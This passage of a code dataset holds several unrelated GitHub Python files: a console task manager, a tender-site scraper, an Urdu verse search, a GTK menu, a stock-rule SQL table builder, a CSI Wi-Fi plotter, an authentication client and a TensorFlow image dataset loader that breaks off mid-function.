\r\n user_file.close()\r\n\r\ndef view_all():\r\n print(f'\\n═══════════════════ {DARKCYAN}{BOLD}View All Tasks{END} ══════════════════\\n')\r\n tasks_read = open('T26 Capstone 3/tasks.txt', 'r')\r\n data = tasks_read.readlines()\r\n # loop through all split lines and output the correct index for each data column\r\n for pos, line in enumerate(data,1):\r\n split_data = line.split(', ')\r\n output = f'∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞[{DARKCYAN}{BOLD}{pos}{END}]∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞\\n'\r\n output += '\\n'\r\n output += f'Assigned To: \\t\\t{split_data[0]}\\n'\r\n output += f'Task Name: \\t\\t{split_data[1]}\\n'\r\n output += f'Task Description: \\t{split_data[2]}\\n'\r\n output += f'Assigned Date: \\t\\t{split_data[3]}\\n'\r\n output += f'Due Date: \\t\\t{split_data[4]}\\n'\r\n output += f'Is Completed: \\t\\t{split_data[5]}\\n'\r\n \r\n print(output)\r\n tasks_read.close()\r\n \r\n\r\ndef add_task():\r\n print(f'\\n═══════════════════ {BLUE}{BOLD}Add A New Task{END} ══════════════════\\n')\r\n task_user = input('Please enter the username of the person the task is assigned to:\\t\\t')\r\n task_title = input('Please enter the task title:\\t\\t\\t\\t\\t\\t\\t')\r\n task_desc = input('Please enter a task description:\\t\\t\\t\\t\\t\\t')\r\n curr_date = input('Please enter todays date as the date assigned in the format \\'XX XXX XXXX\\':\\t')\r\n due_date = input('Please enter a due date for the task in the format \\'XX XXX XXXX\\':\\t\\t')\r\n\r\n tasks_file = open('T26 Capstone 
3/tasks.txt', 'a+')\r\n    tasks_file.write(f'{task_user}, {task_title}, {task_desc}, {curr_date}, {due_date}, No')\r\n    tasks_file.close()\r\n\r\ndef view_mine():\r\n    print(f'\\n══════════════════ {PURPLE}{BOLD} View My Tasks{END} ═══════════════════\\n')\r\n    user_tasks_read = open('T26 Capstone 3/tasks.txt', 'r')\r\n    data = user_tasks_read.readlines()\r\n    # repeat method used for all tasks but ensure the first index matches the user currently logged in\r\n    for pos, line in enumerate(data,1):\r\n        split_data = line.split(', ')\r\n        if split_data[0] == user:\r\n            output = f'∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞[{PURPLE}{BOLD}{pos}{END}]∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞\\n'\r\n            output += '\\n'\r\n            output += f'Assigned To: \\t\\t{split_data[0]}\\n'\r\n            output += f'Task Name: \\t\\t{split_data[1]}\\n'\r\n            output += f'Task Description: \\t{split_data[2]}\\n'\r\n            output += f'Assigned Date: \\t\\t{split_data[3]}\\n'\r\n            output += f'Due Date: \\t\\t{split_data[4]}\\n'\r\n            output += f'Is Completed: \\t\\t{split_data[5]}\\n'\r\n            print(output)\r\n\r\n    while True:\r\n        task_num = int(input('Please enter a specific task number to edit the task or enter -1 to return to main menu: '))-1\r\n        if task_num == -2:\r\n            return \r\n        elif task_num < 0 or task_num >= len(data):\r\n            print('Please select a valid task number.')\r\n            continue\r\n\r\n        edit_data = data[task_num] \r\n        split_edit_data = edit_data.split(', ')\r\n        break\r\n\r\n    while True:\r\n        output = f'\\n∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞ {PURPLE}{BOLD}Select an option{END} ∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞\\n'\r\n        output += f'\\n🔸 {BOLD}1{END} - Edit the task \\n'\r\n        output += f'🔸 {BOLD}2{END} - Mark as completed \\n'\r\n        choice = int(input(output))\r\n\r\n        if choice <= 0 or choice >= 3:\r\n            print('You have selected an invalid option')\r\n            continue\r\n\r\n        if split_edit_data[5].strip('\\n') == 'Yes':\r\n            print(f'\\n{RED}This task is completed and can no longer be edited{END}')\r\n        elif choice == 1:\r\n            while True:\r\n                output = f'\\n{PURPLE}{BOLD} Select an option or enter -1 to return to main menu{END}\\n'\r\n                output += f'\\n🔸 {BOLD}1{END} - Edit username \\n'\r\n                output += f'🔸 {BOLD}2{END} - Edit due date \\n'\r\n                output += f'🔸 {BOLD}3{END} - Edit both \\n'\r\n                output += f'\\n∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞\\n'\r\n\r\n                edit_choice = int(input(output))\r\n\r\n                if edit_choice == -1:\r\n                    break\r\n                elif edit_choice == 1:\r\n                    split_data = edit_data.split(', ')\r\n                    split_data[0] = input('Please enter a new username for this task: ')\r\n                    new_data = ', '.join(split_data)\r\n                    data[task_num] = new_data\r\n                    tasks_write = open('T26 Capstone 3/tasks.txt', 'w')\r\n                    for line in data:\r\n                        tasks_write.write(line)\r\n\r\n                if edit_choice == 2:\r\n                    split_data = edit_data.split(', ')\r\n                    split_data[4] = input('Please enter a new due date for this task: ')\r\n                    new_data = ', '.join(split_data)\r\n                    data[task_num] = new_data\r\n                    tasks_write = open('T26 Capstone 3/tasks.txt', 'w')\r\n                    for line in data:\r\n                        tasks_write.write(line)\r\n\r\n                if edit_choice == 3:\r\n                    split_data = edit_data.split(', ')\r\n                    split_data[0] = input('Please enter a new username for this task: ')\r\n                    split_data[4] = input('Please enter a new due date for this task: ')\r\n                    new_data = ', '.join(split_data)\r\n                    data[task_num] = new_data\r\n                    tasks_write = open('T26 Capstone 3/tasks.txt', 'w')\r\n                    for line in data:\r\n                        tasks_write.write(line)\r\n                    break\r\n\r\n        elif choice == 2:\r\n            split_data = edit_data.split(', ')\r\n            split_data[-1] = 'Yes\\n'\r\n            new_data = ', '.join(split_data)\r\n            data[task_num] = new_data\r\n            tasks_write = 
open('T26 Capstone 3/tasks.txt', 'w')\r\n for line in data:\r\n tasks_write.write(line)\r\n \r\n \r\n break\r\n\r\n user_tasks_read.close()\r\n tasks_write.close()\r\n \r\ndef generate_reports():\r\n# writing the task overview file\r\n user_tasks_read = open('T26 Capstone 3/tasks.txt', 'r')\r\n data = user_tasks_read.readlines()\r\n task_overview = open('T26 Capstone 3/task_overview.txt', 'w') \r\n for pos, line in enumerate(data,1): \r\n num_tasks = pos\r\n count_complete = 0\r\n count_uncomplete = 0 \r\n overdue = 0\r\n# use for loop to count the jobs that have been completed\r\n for line in data:\r\n if line.split(', ')[5].strip('\\n') == 'Yes':\r\n count_complete += 1\r\n else:\r\n count_uncomplete += 1\r\n\r\n due_date = line.split(', ')[4] # the due date in the format \"XX XXX XXXX\" \r\n due_date_datetime = datetime.strptime(due_date, \"%d %b %Y\") # convert the string to a datetime object\r\n if line.split(', ')[5].strip('\\n') == 'No' and datetime.now() > due_date_datetime:\r\n overdue += 1\r\n else:\r\n overdue\r\n\r\n task_overview.write(f\"\"\"════════════════════ TASK OVERVIEW REPORT ═════════════════════\r\nNumber of Tasks:\\t\\t\\t{num_tasks}\r\nNumber of Complete Tasks:\\t{count_complete}\r\nNumber of Uncomplete Tasks:\\t{count_uncomplete}\r\nNumber of Overdue Tasks:\\t{overdue}\r\n% of Uncomplete Tasks:\\t\\t{round(count_uncomplete/num_tasks*100,1)}\r\n% of Overdue Tasks:\\t\\t\\t{round(overdue/count_uncomplete*100,1)}\"\"\")\r\n\r\n# writing the user overview file\r\n# many similar steps are repeated from the tasks overview, however there's an added layer of complexity because we need to reference both the user and tasks file here\r\n# I had to append all the output to a list in order to write it to the txt file\r\n user_file_read = open('T26 Capstone 3/user.txt', 'r')\r\n user_data = user_file_read.readlines()\r\n user_overview = open('T26 Capstone 3/user_overview.txt', 'w')\r\n my_list = []\r\n for pos, line in enumerate(user_data,1): \r\n num_users = pos\r\n split_data = line.split(', ')\r\n output = f'∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞ {split_data[0]} ∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞∞\\n'\r\n user_task_count = 0\r\n user_count_comp = 0\r\n user_count_todo = 0\r\n user_count_overdue = 0\r\n for pos, line in enumerate(data,1): \r\n due_date = line.split(', ')[4] # the due date in the format \"XX XXX XXXX\" \r\n due_date_datetime = datetime.strptime(due_date, \"%d %b %Y\") \r\n if line.split(', ')[0] == split_data[0]:\r\n user_task_count += 1\r\n if line.split(', ')[5].strip('\\n') == 'Yes':\r\n user_count_comp +=1\r\n else:\r\n user_count_todo += 1\r\n if line.split(', ')[5].strip('\\n') == 'No' and datetime.now() > due_date_datetime:\r\n user_count_overdue += 1\r\n \r\n output += f'Total Number of Tasks:\\t\\t\\t{str(user_task_count)}\\n'\r\n output += f'% of Total Number of Tasks:\\t\\t{round(user_task_count / num_tasks * 100,1)}\\n'\r\n try:\r\n output += f'% of Tasks Completed:\\t\\t\\t{round(user_count_comp / user_task_count * 100,1)}\\n'\r\n except ZeroDivisionError:\r\n output += f'% of Tasks Completed:\\t\\t\\t0.0\\n'\r\n try:\r\n output += f'% of Tasks Uncompleted:\\t\\t\\t{round(user_count_todo / user_task_count * 100,1)}\\n'\r\n except ZeroDivisionError:\r\n output += f'% of Tasks Uncompleted:\\t\\t\\t0.0\\n'\r\n try:\r\n output += f'% of Tasks Overdue:\\t\\t\\t\\t{round(user_count_overdue / user_count_todo * 100,1)}\\n'\r\n except ZeroDivisionError:\r\n output += f'% of Tasks Overdue:\\t\\t\\t\\t0.0\\n'\r\n \r\n my_list.append(output) \r\n \r\n \r\n 
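# Write the user-overview header first, then append the per-user blocks gathered in my_list.\r\n    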
user_overview.write(f\"\"\"════════════════════ USER OVERVIEW REPORT ═════════════════════\r\nNumber of Users:\\t\\t\\t\\t{num_users}\r\nNumber of Tasks:\\t\\t\\t\\t{num_tasks}\\n\"\"\")\r\n user_overview.writelines(my_list)\r\n\r\n user_tasks_read.close()\r\n task_overview.close()\r\n user_overview.close()\r\n user_file_read.close()\r\n\r\n\r\n \r\n#====Login Section=======================================================\r\n\r\nprint(f\"\"\" \r\n {RED}╔══════════════════╗{END}\r\n {BOLD}TASK MANAGER \r\n {RED}╚══════════════════╝{END}\r\n \"\"\")\r\nprint('')\r\n\r\nprint(f'══════════ 👋 {YELLOW}{BOLD}Welcome! Please log in!{END} 👋 ═══════════\\n')\r\n# Created a list for users and then added users and passwords to a dictionary \r\nuser_list = []\r\npass_dict = {}\r\n\r\nuser_file = open('T26 Capstone 3/user.txt', 'r')\r\nfile_read = user_file.readlines()\r\n# Loop through the user file, split, append the users to list, users will be keys and then passwords as the values\r\nfor line in file_read:\r\n temp = line.strip('\\n')\r\n temp = temp.split(', ')\r\n user_list.append(temp[0])\r\n pass_dict[temp[0]]=temp[1]\r\n\r\n\"\"\"verify inputs using the user list and passwords in the dictionary,\r\nbreak the loop if both username and password are correct\r\n\"\"\"\r\nwhile True:\r\n user = input('Please enter your username:\\t')\r\n password = input('Please enter your password:\\t')\r\n \r\n if user in user_list and password != pass_dict[user]:\r\n print(f'\\nHello {user}, please enter a valid username and password')\r\n continue \r\n elif user not in user_list:\r\n print('\\nPlease enter a valid username and password\\n')\r\n continue\r\n elif password == pass_dict[user] and user in user_list:\r\n print(f'\\nThank you. Hello {user}!\\n')\r\n break\r\n \r\nuser_file.close()\r\n \r\n# Give admin account additional options, else give standard options\r\nwhile True:\r\n if user == 'admin':\r\n print(f'\\n═════════════════ 🔴 {GREEN}Main Menu{END} 🔴 ═══════════════════\\n')\r\n menu = input(f'''\\nSelect one of the following options below:\r\n🔸 {BOLD}r{END} - Registering a user\r\n🔸 {BOLD}a{END} - Adding a task\r\n🔸 {BOLD}va{END} - View all tasks\r\n🔸 {BOLD}vm{END} - View my task\r\n🔸 {BOLD}gr{END} - Generate reports\r\n🔸 {BOLD}s{END} - Display statistics\r\n🔸 {BOLD}e{END} - Exit\r\n\r\n: ''').lower()\r\n\r\n else:\r\n print(f'\\n═════════════════ 🔴 {GREEN}Main Menu{END} 🔴 ═══════════════════\\n')\r\n menu = input(f'''\\nSelect one of the following options below:\r\n🔸 {BOLD}r{END} - Registering a user\r\n🔸 {BOLD}a{END} - Adding a task\r\n🔸 {BOLD}va{END} - View all tasks\r\n🔸 {BOLD}vm{END} - View my task\r\n🔸 {BOLD}e{END} - Exit\r\n\r\n: ''').lower()\r\n\r\n# if user selects r and is logged in as admin, allow to add user if passwords match, else deny request\r\n if menu == 'r':\r\n if user == 'admin':\r\n reg_user() \r\n else:\r\n print(f'\\n{RED}You are not authorised to register new users, please select a different option{END}\\n')\r\n continue\r\n \r\n# ask for user inputs then write these to the tasks file using a+ access mode\r\n elif menu == 'a':\r\n add_task()\r\n\r\n elif menu == 'va':\r\n view_all()\r\n\r\n elif menu == 'vm':\r\n view_mine()\r\n# call the function to generate the reports and then print in the terminal using read and a for loop \r\n elif menu == 's' and user == 'admin':\r\n generate_reports()\r\n task_overview = open('T26 Capstone 3/task_overview.txt','r')\r\n\r\n for line in task_overview:\r\n line = line.replace('\\t',' ')\r\n print(line)\r\n print()\r\n user_overview = 
open('T26 Capstone 3/user_overview.txt','r')\r\n for line in user_overview:\r\n line = line.replace('\\t',' ')\r\n print(line)\r\n \r\n task_overview.close()\r\n user_overview.close()\r\n# if admin selects gr, write the reports to 2 txt files\r\n elif menu == 'gr' and user == 'admin':\r\n generate_reports()\r\n\r\n elif menu == 'e':\r\n print(f'\\n═════════════════ 👋 {YELLOW}{BOLD}Goodbye!!!{END} 👋 ══════════════════\\n')\r\n exit()\r\n\r\n else:\r\n print(f\"\\n{RED}You have made a wrong choice, Please Try again{END}\\n\")","repo_name":"GazMorton/Task-Manager-Program","sub_path":"task_manager.py","file_name":"task_manager.py","file_ext":"py","file_size_in_byte":18054,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"20519902661","text":"import datetime\nimport sqlite3\n\nfrom tenders.parsers.abstractParser import AbstractParser, TenderIsExpired\n\n\nclass Parser(AbstractParser):\n def init_search_line(self, keyword):\n search_line1 = 'http://zakupki.gov.ru/epz/order/quicksearch/search_eis.html?searchString='\n search_line2 = '&pageNumber=1&sortDirection=false&recordsPerPage=_10&showLotsInfoHidden=false&fz44=on&fz223=on&ppRf615=on&af=on¤cyId=-1®ionDeleted=false&sortBy=PUBLISH_DATE'\n self.search_line = search_line1 + keyword + search_line2\n\n def go_to_next_page(self):\n texts = self.search_line.split('pageNumber=')\n page_number = int(texts[1][0])\n page_number += 1\n self.search_line = texts[0] + 'pageNumber=' + str(page_number) + texts[1][1:]\n\n def search_on_current_page(self, soup):\n objs = soup.findAll('div', attrs={'class': 'registerBox registerBoxBank margBtm20'})\n for obj in objs:\n self.parse_obj(obj)\n\n def parse_obj(self, obj):\n obj1 = obj.find('td', attrs={'class': 'descriptTenderTd'})\n obj1 = obj1.find('a', attrs={'target': '_blank'})\n url = obj1['href']\n if url.startswith('/'):\n url = 'http://zakupki.gov.ru' + url\n obj2 = obj.find('td', attrs={'class': 'tenderTd'})\n obj2 = obj2.findAll('dd')[1]\n obj2 = obj2.find('strong')\n try:\n text = obj2.text.strip()\n text1 = text.split(',')[0].strip().replace('\\xa0', '')\n text2 = text.split(',')[1].strip()\n text = text1 + '.' 
+ text2\n _sum = float(text)\n except AttributeError:\n _sum = 0.\n obj3 = obj.find('td', attrs={'class': 'descriptTenderTd'})\n obj3 = obj3.findAll('dd')[1]\n try:\n description = obj3.text.strip().replace('\"', '\\'')\n except AttributeError:\n description = ''\n obj4 = obj.find('td', attrs={'class': 'descriptTenderTd'})\n obj4 = obj4.findAll('dd')[0]\n try:\n customer = obj4.text.strip().split(':')[1].strip().replace('\"', '\\'')\n except AttributeError:\n customer = ''\n obj5 = obj.find('td', attrs={'class': 'amountTenderTd'})\n obj5 = obj5.find('li')\n try:\n text = obj5.text.strip().split(':')[1].strip()\n created = text.split('.')[2]+'-'+text.split('.')[1]+'-'+text.split('.')[0]\n except AttributeError:\n created = '2100-01-01'\n deadline = '2018-12-31'\n loaded = str(datetime.date.today())\n on_delete = False\n if created < '2018-11-28':\n raise TenderIsExpired()\n conn = sqlite3.connect('db.sqlite3')\n cursor = conn.cursor()\n cursor.execute('select * from tenders_tender order by id desc')\n res = cursor.fetchall()\n conn.close()\n if len(res) != 0:\n res = res[0][1]\n if url == res:\n raise TenderIsExpired()\n self.create_tender(url, description, customer, _sum, created, deadline, loaded, on_delete)\n\n","repo_name":"terrysloane8/my_site","sub_path":"tenders/parsers/zakupki_gov_ru_parser.py","file_name":"zakupki_gov_ru_parser.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21267905719","text":"#Finding a verse(شعر) from file with given words\n\nfrom itertools import islice\nimport os\n\nBASE = os.path.join(\"H:\",os.sep,\"MISC\",\"URDU\",\"NasirKazmi\")\nFILE = os.path.join(BASE,\"Nasir.txt\")\n\nfind = ('دھوپ','فراق','گرفتگی')\nprevLine = \"\"\n\nwith open(FILE, 'r', encoding='utf-8') as infile:\n for line in infile:\n if any(word in line for word in find):\n if prevLine.strip() == '':\n print( '{}'.format(line.rstrip()) )\n\n #Print next line using islice function and value 1 for just next line\n print( ''.join(islice(infile, 1)) )\n elif prevLine.strip() != '':\n print(prevLine) \n print( line )\n \n #print('{:4d}: {}'.format(line_no-1, previous) )\n \n prevLine = line.lower()\n","repo_name":"Mohibtech/Mohib-Python","sub_path":"urdu scripts/Finding Verse for words.py","file_name":"Finding Verse for words.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"3737275253","text":"from gettext import gettext as _\n\nfrom gi.repository import Gtk, Granite\n\n\nclass DocumentContextMenu(Gtk.Menu):\n\n def __init__(self, attach_to=None, archived=False):\n super().__init__()\n self.attach_to_widget(attach_to)\n\n export_menu = Gtk.MenuItem(action_name='document.export')\n export_menu.add(Granite.AccelLabel.from_action_name(_('Export...'), 'document.export'))\n\n rename_menu = Gtk.MenuItem(action_name='document.rename')\n rename_menu.add(Granite.AccelLabel.from_action_name(_('Rename'), 'document.rename'))\n\n archive_menu = Gtk.MenuItem(action_name='document.archive')\n archive_menu.add(Granite.AccelLabel.from_action_name(_('Archive'), 'document.archive'))\n\n unarchive_menu = Gtk.MenuItem(action_name='document.unarchive')\n unarchive_menu.add(Granite.AccelLabel.from_action_name(_('Unarchive'), 'document.unarchive'))\n\n delete_menu = Gtk.MenuItem(action_name='document.delete')\n delete_menu.add(Granite.AccelLabel.from_action_name(_('Delete'), 'document.delete'))\n\n 
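# Assemble the menu: rename and export first, then archive or unarchive depending on state, then delete.\n        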
self.append(rename_menu)\n self.append(Gtk.SeparatorMenuItem())\n self.append(export_menu)\n self.append(Gtk.SeparatorMenuItem())\n\n if not archived:\n self.append(archive_menu)\n else:\n self.append(unarchive_menu)\n\n self.append(delete_menu)\n self.show_all()\n","repo_name":"rottenpants466/Norka","sub_path":"norka/widgets/document_context_menu.py","file_name":"document_context_menu.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"12913935727","text":"import logging\nimport sqlite3\n\nfrom pyswing.utils.Logger import Logger\nimport pyswing.constants\nimport pyswing.database\n\n\nclass HistoricMatches(object):\n \"\"\"\n ?\n \"\"\"\n\n def __init__(self):\n \"\"\"\n ?\n \"\"\"\n\n Logger.log(logging.DEBUG, \"Log Object Creation\", {\"scope\": __name__})\n\n self._rules = self._getRules()\n\n def createTable(self):\n\n self._createTable(0, 50)\n self._createTable(51, 100)\n self._createTable(101, 150)\n self._createTable(151, 200)\n\n deleteTableStatement = \"DROP TABLE IF EXISTS HistoricMatches\"\n createTableStatement = \"\"\"CREATE TABLE HistoricMatches AS\n select h1.Date, h1.Code, h1.matchString || h2.matchString || h3.matchString || h4.matchString as matchString\n from HistoricMatches_0_50 h1\n inner join HistoricMatches_51_100 h2 on h1.Date = h2.Date and h1.Code = h2.Code\n inner join HistoricMatches_101_150 h3 on h1.Date = h3.Date and h1.Code = h3.Code\n inner join HistoricMatches_151_200 h4 on h1.Date = h4.Date and h1.Code = h4.Code\n \"\"\"\n\n connection = sqlite3.connect(pyswing.database.pySwingDatabase)\n c = connection.cursor()\n c.executescript(deleteTableStatement)\n c.executescript(createTableStatement)\n connection.commit()\n c.close()\n connection.close()\n\n def _createTable(self, startIndex, stopIndex):\n\n Logger.log(logging.INFO, \"Create Historic Matches Table\",\n {\"scope\": __name__, \"startIndex\": str(startIndex), \"stopIndex\": str(stopIndex)})\n\n deleteTableStatement, createTableStatement = self._generateSqlStatements(startIndex, stopIndex)\n\n # print(deleteTableStatement)\n # print(createTableStatement)\n\n connection = sqlite3.connect(pyswing.database.pySwingDatabase)\n c = connection.cursor()\n c.executescript(deleteTableStatement)\n c.executescript(createTableStatement)\n connection.commit()\n c.close()\n connection.close()\n\n def _getRules(self):\n connection = sqlite3.connect(pyswing.database.pySwingDatabase)\n\n query = \"SELECT name FROM sqlite_master WHERE type='table' and name like 'Rule %' order by name\"\n\n rules = None\n\n cursor = connection.cursor()\n try:\n cursor.execute(query)\n rules = cursor.fetchall()\n except sqlite3.OperationalError:\n Logger.log(logging.INFO, \"Error Getting Rules\", {\"scope\": __name__})\n\n connection.close()\n\n return [(rule[0]) for rule in rules]\n\n def _generateSqlStatements(self, startIndex, stopIndex):\n\n tableName = \"HistoricMatches_%i_%i\" % (startIndex, stopIndex)\n\n deleteTableStatement = \"DROP TABLE IF EXISTS %s\" % (tableName)\n\n createTableStatement = \"CREATE TABLE %s AS \\n\" % (tableName)\n selectStatement = \"select r%i.Date, r%i.Code, ''\" % (startIndex, startIndex)\n fromStatement = \"\"\n joinStatement = \"\"\n\n for index, rule in enumerate(self._rules):\n\n if index >= startIndex and index <= stopIndex:\n\n selectStatement += \" || ifnull(r%i.Match, 0)\" % (index)\n\n if index == startIndex:\n fromStatement = \"\\nfrom \\\"%s\\\" r%i\\n\" % (rule, index)\n else:\n if \"_ADI\" in rule:\n 
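# Rules with _ADI in the name are joined on Date only; every other rule joins on both Date and Code.\n                        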
joinStatement += \"inner join \\\"%s\\\" r%i on r%i.Date = r%i.Date\\n\" % (\n rule, index, startIndex, index)\n else:\n joinStatement += \"inner join \\\"%s\\\" r%i on r%i.Date = r%i.Date and r%i.Code = r%i.Code\\n\" % (\n rule, index, startIndex, index, startIndex, index)\n\n selectStatement += \" as matchString\"\n\n createTableStatement += selectStatement + fromStatement + joinStatement\n\n return (deleteTableStatement, createTableStatement)\n","repo_name":"garyjoy/pyswing","sub_path":"pyswing/objects/historicMatches.py","file_name":"historicMatches.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"34472981076","text":"\nimport matlab.engine\n\nimport RealtimePlotter.Temp_30_Pause as Tm_30\n\nimport RealtimePlotter.Real_1_animation_Class as R1\n#from RealtimePlotter.Real_1_animation_Class import * # #import _SinePlotter\n\nimport RealtimePlotter.CSI_GUI as CGUI #CGUI.param_get/CGUI.param_list/CGUI.CSI_GU\n#from RealtimePlotter.CSI_GUI import *\n\nimport threading\nimport time\n\n\ncsi_windaw_state=False\n\nif __name__ == '__main__':\n\n global csi_windaw_state\n #初始化matlab\n eng = matlab.engine.start_matlab()\n print(\"Matlab_OK\")\n eng.path(eng.path(), r'/home/houhuan/Pycharm/Workplace/CSI_process/matlab_function')#为Matlab添加新的工作路径\n\n #csi_trace, pin = eng.read_file_realtime(r'/linux-80211n-csitool-supplementary/CSI_Data/666.dat', 0, nargout=2);##########%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 调用了matlab engine\n GUI= threading.Thread(target=CGUI.CSI_GUI)\n #GUI.setDaemon(True) #主线程退出,该线程退出\n GUI.start()\n while GUI.is_alive():\n print(\"test\")\n if CGUI.param_get:\n #CGUI.param_list[0]\n #读取参数,调用相应的画图功能函数\n if CGUI.param_list[4]==1:\n #调用1个子载波实时画图\n plotter =R1._SinePlotter(eng)\n csi_windaw_state = True\n plotter.start()#一个线程,即主线程调用画图函数,根据初始化过程,定时(interval_msec=66)的更新图画数据(getValues)\n if ~plotter.is_open:\n csi_windaw_state=False\n else:\n #调用30个子载波画图\n csi_windaw_state = True\n Tm_30.start_30_fun(eng)\n if ~Tm_30.is_open:\n csi_windaw_state = False\n param_get = False #关闭窗口之后才允许再次传参数\n\n\n print(\"houge\")\n","repo_name":"iamhouhuanhuan/Real_CSI_Test","sub_path":"RealtimePlotter/phaseplot.py","file_name":"phaseplot.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"41108366494","text":"from titanauth.models.user_reference import ExternalAuthReference\nfrom titanauth.authentication.constants import (\n AUTH_AUTHENTICATE_URL, AUTH_STATE_URL, AUTH_RELEASE_URL\n)\n\nimport requests\nimport json\n\n\nclass AuthWrapper(object):\n def __init__(self):\n \"\"\"\n Initialize new AuthWrapper object.\n \"\"\"\n self.reference = ExternalAuthReference.objects.first()\n\n def authenticate(self):\n \"\"\"\n Attempt to authenticate a specified set of credentials against the external backend.\n\n If no credentials are specified, an attempt is made to use the user reference if one is available.\n \"\"\"\n # Fire a request off to the external backend, to determine if the information present\n # exists and is valid within the system.\n return requests.post(\n url=AUTH_AUTHENTICATE_URL,\n data={\n \"email\": self.reference.email,\n \"token\": self.reference.token\n }\n )\n\n def authenticate_runner(self):\n \"\"\"\n Attempt to authenticate a user and return simple booleans to determine status.\n \"\"\"\n if not self.reference.valid:\n # User is logged in already, and they're reference is not\n # in a 
valid state, return false early.\n return False\n\n try:\n response = requests.post(\n url=AUTH_AUTHENTICATE_URL,\n data={\n \"email\": self.reference.email,\n \"token\": self.reference.token,\n }\n )\n _content = json.loads(response.content)\n except Exception:\n # Return false if any errors occur while requesting\n # authentication status.\n return False\n\n # Return the current status for this users authentication\n # check, this allows us to force a logout or instance termination.\n return _content[\"status\"] != \"error\"\n\n def _state(self, state):\n if not self.reference.valid:\n raise ValueError(\"Authentication reference: {ref} is invalid.\".format(ref=self.reference))\n\n return requests.post(\n url=AUTH_STATE_URL,\n data={\n \"email\": self.reference.email,\n \"token\": self.reference.token,\n \"state\": state,\n }\n )\n\n def offline(self):\n \"\"\"\n Attempt to set the current authentication wrapper to an offline state.\n \"\"\"\n return self._state(state=\"offline\")\n\n def online(self):\n \"\"\"\n Attempt to set the current authentication reference to an online state.\n \"\"\"\n return self._state(state=\"online\")\n\n def release_information(self, version):\n \"\"\"\n Retrieve the version information for the specified version.\n \"\"\"\n if not self.reference.valid:\n raise ValueError(\"Authentication reference: {ref} is invalid.\".format(ref=self.reference))\n\n return requests.get(\n url=AUTH_RELEASE_URL,\n params={\n \"version\": version\n }\n ).json()\n","repo_name":"hohenheim52/titandash","sub_path":"titanbot/titanauth/authentication/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14113554677","text":"import os\n\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom tensorflow.python.data import AUTOTUNE\n\n\nclass CatDataset:\n def __init__(self, input_width, input_height, dataset_dir, annotation_path='./data/train.csv', lable_column='category_id',\n class_mapping=None):\n self.annotation_path = annotation_path\n self.train_features = []\n self.train_labels = []\n self.val_features = []\n self.val_labels = []\n self.input_width = input_width\n self.input_height = input_height\n self.lable_column = lable_column\n self.class_mapping = class_mapping\n self.dataset_dir = dataset_dir\n self.prepare(lable_column=lable_column)\n\n def prepare(self, lable_column):\n df = pd.read_csv(self.annotation_path)\n df['path'] = df.product_id.apply(lambda x: os.path.join(self.dataset_dir, x + \".jpg\"))\n for class_index in self.class_mapping.keys():\n data = df[df[lable_column] == class_index]\n np.random.seed(0)\n mask = np.random.rand(len(data)) < 0.8\n self.train_features.extend(data[mask][\"path\"].tolist())\n self.train_labels.extend(data[mask][lable_column].tolist())\n self.val_features.extend(data[~mask][\"path\"].tolist())\n self.val_labels.extend(data[~mask][lable_column].tolist())\n\n print(f\"There are {len(self.train_features)} training images, {len(self.val_features)} validation images\")\n\n def build(self, mode, batch_size, count=-1):\n if mode == \"train\":\n dataset = tf.data.Dataset.from_tensor_slices(\n (self.train_features, self.train_labels))\n elif mode == \"valid\":\n dataset = tf.data.Dataset.from_tensor_slices(\n (self.val_features, self.val_labels))\n dataset = dataset.map(self.load_from_path_label, num_parallel_calls=AUTOTUNE)\n if mode == \"train\":\n dataset = dataset.map(random_rotate, 
num_parallel_calls=AUTOTUNE)\n dataset = dataset.map(random_flip, num_parallel_calls=AUTOTUNE)\n dataset = dataset.shuffle(\n buffer_size=1000, reshuffle_each_iteration=True).repeat(count=count).batch(batch_size)\n elif mode == \"valid\":\n dataset = dataset.shuffle(\n buffer_size=1000, reshuffle_each_iteration=True).batch(batch_size=batch_size)\n dataset = dataset.prefetch(buffer_size=AUTOTUNE)\n return dataset\n\n def load_from_path_label(self, path, label):\n image = tf.io.read_file(path)\n image = tf.image.decode_jpeg(image, channels=3)\n image = tf.image.resize(image, [self.input_width, self.input_height])\n return tf.cast(image, tf.float64), tf.cast(label-1, tf.int32)\n\n\nclass PriceDataset(CatDataset):\n def prepare(self, lable_column):\n df = pd.read_csv(self.annotation_path)\n df['price'] = df['price'].apply(lambda x: x.replace(\",\", \"\"))\n df['price'] = df['price'].astype(float)\n print(df.price.dtype)\n df['path'] = df.product_id.apply(lambda x: os.path.join(self.dataset_dir, x + \".jpg\"))\n np.random.seed(0)\n mask = np.random.rand(len(df)) < 0.8\n 